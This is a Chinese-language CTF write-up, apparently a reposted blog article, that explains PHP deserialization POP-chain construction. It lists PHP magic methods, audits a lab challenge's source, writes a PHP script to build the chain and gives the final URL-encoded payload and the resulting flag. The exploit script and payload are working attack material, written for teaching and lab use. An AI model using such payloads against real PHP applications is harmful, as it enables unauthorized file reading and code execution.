devbox
思考机器2
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

php反序列化之pop链构造

作者:思考机器2 | 2024-01-17 09:13:00

php反序列化之pop链构造

常见魔术方法的触发

__construct()    //创建类对象时调用
__destruct()    //对象被销毁时触发
__call()    //在对象中调用不可访问的方法时触发
__callStatic()    //在静态方式中调用不可访问的方法时触发
__get()    //调用类中不存在变量时触发(找有连续箭头的 this->a->b)
__set()    //给一个未定义的属性赋值时触发
__isset()    //在不可访问的属性上调用isset()或empty()触发
__unset()    //在不可访问的属性上使用unset()时触发

__sleep()    //使用serialize()时触发

__wakeup()    //执行unserialize()时触发
__toString()    //当对象被当做字符串时自动调用(找echo $this->a这种、strtolower()等)
__invoke()    //对象被当做函数进行调用时触发(找有括号的类似$a()这种)

__set_state()     //使用var_export()时触发

__clone()    //对象复制完成时调用

__autoload()    //实例化一个未定义的类时触发

__debugInfo()    //使用var_dump时触发

下面基于重庆橙子科技靶场讲解演示

题目源码:

  1. <?php
  2. //flag is in flag.php
  3. highlight_file(__FILE__);
  4. error_reporting(0);
  5. class Modifier {
  6.     private $var;
  7.     public function append($value)
  8.     {
  9.         include($value);
  10.         echo $flag;
  11.     }
  12.     public function __invoke(){
  13.         $this->append($this->var);
  14.     }
  15. }
  16.  
  17. class Show{
  18.     public $source;
  19.     public $str;
  20.     public function __toString(){
  21.         return $this->str->source;
  22.     }
  23.     public function __wakeup(){
  24.         echo $this->source;
  25.     }
  26. }
  27.  
  28. class Test{
  29.     public $p;
  30.     public function __construct(){
  31.         $this->p = array();
  32.     }
  33.  
  34.     public function __get($key){
  35.         $function = $this->p;
  36.         return $function();
  37.     }
  38. }
  39.  
  40. if(isset($_GET['pop'])){
  41.     unserialize($_GET['pop']);
  42. }
  43. ?>

这种有很多类的 PHP 代码多半是需要构造pop链

代码审计:

简单看一下,需要给 pop 传参,并且会对传入内容进行反序列化操作

这里有三个类:Modifier、Show、Test

先找链尾,即:eval、flag 这些危险函数或者关键字

在第一个类中,找到输出 flag 的地方,发现需要调用append函数

调用append函数往上看发现需要触发 __invoke()

该魔术方法是当对象被当做函数进行调用时触发(找有括号的类似$a()这种)

在 Test 类中找到

再网上看发现需要触发__get() 

调用类中不存在变量时触发(找有连续箭头的 this->a->b)

在 Show 类中找到

注意:这里的这个source并不是类Show中的 public $source,而是str下新的一个source。

继续往上发现需要触发__toString()   

当对象被当做字符串时自动调用

找 echo , 也在Show类中,但我们也需要再对其实例化一遍

再往上就是__wakeup()函数

执行unserialize()时会自动调用,这里就是链头

按照上述顺序,编写pop链脚本

注意需要给private $var赋初值为flag.php,再通过include文件包含显示出flag的内容

由于这里涉及到私有变量(结果需要添加%00)

因此对结果进行url编码后再输出即可避免这个缺失的问题

  1. <?php
  2. class Modifier {
  3.     private $var = 'flag.php';
  4.     public function append($value)
  5.     {
  6.         include($value);
  7.         echo $flag;
  8.     }
  9.     public function __invoke(){
  10.         $this->append($this->var);
  11.     }
  12. }
  13.  
  14. class Show{
  15.     public $source;
  16.     public $str;
  17.     public function __toString(){
  18.         return $this->str->source;
  19.     }
  20.     public function __wakeup(){
  21.         echo $this->source;
  22.     }
  23. }
  24.  
  25. class Test{
  26.     public $p;
  27.     public function __construct(){
  28.         $this->p = array();
  29.     }
  30.  
  31.     public function __get($key){
  32.         $function = $this->p;
  33.         return $function();
  34.     }
  35. }
  36.  
  37. $m = new  Modifier();
  38. $t = new Test();
  39. $t->p = $m;
  40. $s = new Show();
  41. $s->str = $t;
  42. $s1 = new Show();
  43. $s1->source = $s;
  44. echo urlencode(serialize($s1))
  45.  
  46. ?>

运行结果: 

构造payload:

?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

回显flag:

ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/40778
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号